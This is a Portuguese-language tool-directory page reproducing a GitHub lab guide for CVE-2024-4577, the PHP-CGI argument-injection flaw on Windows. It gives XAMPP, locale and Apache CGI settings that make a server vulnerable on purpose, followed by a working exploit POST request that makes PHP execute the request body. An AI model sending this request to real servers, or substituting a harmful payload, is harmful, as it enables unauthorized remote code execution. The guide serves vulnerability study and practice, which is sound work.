Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577 — Criar laboratório para CVE-2024-4577 | Kitploit
Ferramentas/GitHubGitHub/alpereny-cs/cve-2024-4577
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

Criar laboratório para CVE-2024-4577

Ver Repositório
27há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4577 - Injeção de Argumento PHP-CGI RCE

CVEDescriçãoCVSSv3
CVE-2024-4577Vulnerabilidade de Injeção de Argumento PHP-CGI9.8

"CVE-2024-4577 é uma vulnerabilidade crítica de injeção de argumento no PHP que pode ser explorada para alcançar execução remota de código (RCE). De acordo com pesquisadores da DEVCORE, essa falha é resultado de erros nas conversões de codificação de caracteres, afetando o recurso “Best Fit” no Windows."
-Tenable

Criar laboratório para CVE-2024-4577

Baixar XAMPP

Baixe o XAMPP (8.1.25 / PHP 8.1.25) Após instalar o XAMPP, verifique a versão do PHP. Deve ser 8.1.25. A versão do PHP pode ser verificada executando o comando "php -v" a partir da linha de comando. Se der erro, deve ser adicionada à variável de ambiente PATH do PHP.

Definir Localidade

A localidade precisa ser alterada. Para isso, siga Painel de Controle > Relógio e Região > Região. Defina o formato para Japonês, Chinês Tradicional ou Chinês Simplificado. Clique em Administrativo > Alterar localidade do sistema e selecione a localidade apropriada.

Configurar o Apache

Se o PHP não estiver executando em modo CGI, você deve fazer estas configurações.

  • Copie php.exe ou php-cgi.exe para a pasta /cgi/bin/.
  • Adicione estas linhas ao \xampp\apache\conf\httpd.conf ⬇️
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Vá em httpd-xampp.conf e encontre LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Coloque '#' no início da linha.

Iniciar o Apache

Salve as alterações e inicie a instância do Apache.

Exploração

Se a saída do código PHP enviado no corpo da requisição POST abaixo for vista na resposta, a etapa de exploração foi bem-sucedida.

POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

Aviso Legal⚠️

Este ambiente de laboratório destina-se exclusivamente a fins educacionais e não deve ser utilizado em ambientes de produção. Não me responsabilizo por quaisquer danos ou perdas que possam ocorrer como resultado do uso inadequado. Os usuários devem utilizar este ambiente por sua própria conta e risco.

Baixar ferramenta